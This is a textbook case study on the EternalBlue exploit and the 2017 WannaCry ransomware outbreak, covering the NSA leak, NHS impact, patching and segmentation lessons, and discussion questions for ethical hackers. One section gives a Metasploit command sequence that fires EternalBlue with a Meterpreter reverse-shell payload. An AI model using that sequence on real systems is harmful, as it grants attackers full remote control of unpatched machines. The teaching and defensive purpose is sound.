Case Study 12.1: EternalBlue and WannaCry — How an NSA Exploit Became Global Ransomware

Overview

On May 12, 2017, the WannaCry ransomware attack swept across the globe in a matter of hours, infecting over 230,000 computers in 150 countries. Hospitals turned away patients, factories halted production, and government agencies went offline. The attack caused an estimated $4-8 billion in damages worldwide. At its heart was EternalBlue, a sophisticated exploit developed by the United States National Security Agency (NSA) that had been stolen and leaked by a group calling themselves the Shadow Brokers.

The WannaCry incident is a masterclass in understanding exploitation—how vulnerabilities are discovered, weaponized, leaked, and ultimately deployed at scale. For ethical hackers, it illustrates both the devastating power of exploitation tools and the critical importance of timely patching.

Background: The Shadow Brokers and the NSA

The NSA's Tailored Access Operations

The NSA's Tailored Access Operations (TAO) unit, now known as Computer Network Operations, is the U.S. government's elite hacking group. TAO develops and stockpiles zero-day exploits—vulnerabilities unknown to the software vendor—for use in intelligence operations. Among their arsenal was a collection of exploits targeting Microsoft Windows' SMB (Server Message Block) protocol, code-named EternalBlue, EternalRomance, EternalSynergy, and EternalChampion.

EternalBlue specifically targeted a vulnerability in the SMBv1 protocol (CVE-2017-0144). The flaw existed in how Windows handled certain SMB transaction requests. By sending specially crafted packets, an attacker could trigger a buffer overflow in the Windows kernel, gaining SYSTEM-level code execution on the target. The exploit was remarkable for its reliability across multiple Windows versions and its ability to achieve code execution with no authentication required.

The Shadow Brokers Leak

On August 13, 2016, a group calling themselves the Shadow Brokers began leaking NSA hacking tools. After several months of attempted auctions and partial releases, on April 14, 2017, they released their most devastating dump: a collection of Windows exploits from TAO, including EternalBlue.

The timing raised immediate concerns. Microsoft had released security bulletin MS17-010 on March 14, 2017—exactly one month before the leak—patching the vulnerability. This led to widespread speculation that Microsoft had been tipped off about the impending release. However, many organizations had not yet applied the patch, leaving millions of systems vulnerable.

The Vulnerability in Detail

The EternalBlue exploit targets a flaw in the SMBv1 protocol's handling of Transaction 2 (Trans2) requests. Specifically:

  1. The vulnerability exists in the SrvOs2FeaListSizeToNt() function in the Windows SMB server driver (srv.sys).
  2. When processing an SMB_COM_TRANSACTION2 request with specific subcommands, the function incorrectly calculates the size of a converted data structure.
  3. An attacker can craft a request that causes a buffer overflow in the Windows kernel's non-paged pool.
  4. By carefully controlling the overflow data, the attacker corrupts adjacent pool allocations and gains arbitrary code execution in kernel mode.

The exploit is classified as "Average" ranking in Metasploit because kernel pool corruption exploits can occasionally cause a Blue Screen of Death (BSOD) if the memory layout does not align correctly. However, the exploit developers at TAO had made it remarkably reliable through careful heap grooming techniques.

The WannaCry Attack

The Malware

WannaCry (also known as WannaCrypt, WCry, or Wana Decrypt0r) was a ransomware worm that combined the EternalBlue exploit with a ransomware payload. Its key components:

  • EternalBlue exploit module — Used to gain initial code execution on vulnerable systems
  • DoublePulsar backdoor installer — A secondary NSA tool used to inject the payload into the target's memory
  • Ransomware payload — Encrypted user files with AES-128 and RSA-2048, demanding $300-600 in Bitcoin for decryption
  • Worm propagation — After encrypting files, the malware scanned for additional vulnerable hosts on the local network and across the internet, spreading automatically

Timeline of the Attack

May 12, 2017, 07:44 UTC — First infections detected. WannaCry begins spreading rapidly, primarily through organizations with large numbers of unpatched Windows systems.

08:00-12:00 UTC — The UK's National Health Service (NHS) is severely impacted. 80 NHS trusts (approximately one-third of all trusts in England) are affected. Hospitals divert ambulances, cancel surgeries, and revert to paper records. Some hospitals post signs telling patients not to come to the emergency department unless absolutely necessary.

12:00-18:00 UTC — The attack spreads globally. Telefonica in Spain, Deutsche Bahn in Germany, FedEx in the United States, and Renault in France all report infections. Russia's Interior Ministry, China's universities, and India's police are hit.

15:00 UTC — Marcus Hutchins, a 22-year-old British security researcher operating under the alias MalwareTech, discovers that WannaCry checks for the existence of a specific domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com) before executing. If the domain resolves, the malware stops. Hutchins registers the domain for $10.69, inadvertently activating a "kill switch" that halts the spread of new infections.

May 13-14, 2017 — Modified variants without the kill switch appear but spread less effectively. The initial wave's damage is largely done.

Impact on Healthcare

The NHS impact was particularly devastating:

  • 6,912 appointments cancelled, including 139 cancer referrals
  • 595 GP practices affected
  • Five hospitals diverted ambulances to other facilities
  • Patients with life-threatening conditions were transferred
  • Some trusts took weeks to fully recover
  • Total estimated cost to the NHS: £92 million ($120 million)

The NHS was disproportionately affected because: - Many systems still ran Windows XP, which was no longer receiving security updates - The MS17-010 patch had not been deployed across the organization - Network segmentation was inadequate, allowing the worm to spread freely - Many medical devices ran embedded Windows versions that could not be easily patched

Lessons for Ethical Hackers

1. Exploitation Impact Demonstration

EternalBlue remains one of the most powerful demonstration exploits because it achieves unauthenticated SYSTEM-level access on unpatched systems. When you find MS17-010 vulnerability during a penetration test (and in 2026, this still happens—legacy systems, medical devices, and isolated networks often remain unpatched), you can demonstrate the complete attack chain:

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS <target>
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > exploit

The resulting SYSTEM-level Meterpreter session demonstrates the maximum impact: full system control, credential extraction, lateral movement capability, and access to all local data.

2. The Patching Imperative

WannaCry's global spread was entirely preventable. Microsoft released the patch two months before the attack. Organizations that had applied MS17-010 were immune. This is the single most important lesson: timely patching is the most effective defense against known exploits.

As penetration testers, when we find unpatched systems, our reports must convey not just the technical vulnerability but the business impact—using WannaCry as a reference point that executives understand.

3. Network Segmentation Matters

WannaCry spread laterally because networks were flat—a single infected workstation could scan and infect every vulnerable system on the network. Proper segmentation would have contained the damage.

In the MedSecure scenario, if the clinical VLAN, administrative VLAN, and server VLAN are properly segmented with strict firewall rules, an EternalBlue infection on one segment cannot spread to others.

4. Legacy System Risk

The NHS's Windows XP systems represented a massive risk that had been documented in audit after audit but never adequately addressed. Ethical hackers must specifically identify and report legacy operating systems, even if no specific exploit is demonstrated against them—their presence represents systemic risk.

Blue Team Takeaways

🔵 Blue Team Perspective: - Patch management is the primary defense against known exploits. Implement a patch management program with SLAs: critical patches within 72 hours, high within 2 weeks. - Disable SMBv1 on all systems where it is not absolutely required. SMBv1 is a legacy protocol from 1983 and should not be running on modern networks. - Network segmentation limits blast radius. Implement microsegmentation between workstations, servers, and critical infrastructure. - Endpoint Detection and Response (EDR) can detect exploitation attempts even before patches are available, through behavioral analysis. - Backup and recovery procedures must be tested regularly. Organizations that could restore from backups recovered from WannaCry quickly; those without backups faced permanent data loss.

Discussion Questions

  1. Should intelligence agencies stockpile zero-day exploits, given the risk that they may be stolen and weaponized? What is the ethical framework for this decision?

  2. The kill switch domain was a single point of failure in WannaCry's design. What does this tell us about the sophistication of the malware authors? How might future ransomware avoid such weaknesses?

  3. If you discovered during a MedSecure penetration test that 15% of their systems were vulnerable to EternalBlue in 2026, how would you communicate the urgency to non-technical executives?

  4. Marcus Hutchins registered the kill switch domain without fully understanding its purpose. He later faced legal issues for unrelated malware development. How does this case illustrate the complex ethics of security research?

  5. The NHS had been warned repeatedly about the risk of running Windows XP. Why do organizations fail to act on known risks, and how can penetration testers' reports be more effective at driving change?

References

  • Bright, P. (2017). "WannaCrypt ransomware: Everything you need to know." Ars Technica.
  • Department of Health and Social Care. (2018). "Lessons learned review of the WannaCry Ransomware Cyber Attack."
  • Greenberg, A. (2019). Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin's Most Dangerous Hackers. Doubleday.
  • Microsoft. (2017). "Microsoft Security Bulletin MS17-010 – Critical."
  • National Audit Office. (2018). "Investigation: WannaCry cyber attack and the NHS."
  • Symantec Security Response. (2017). "WannaCry Ransomware Attack: Technical Analysis."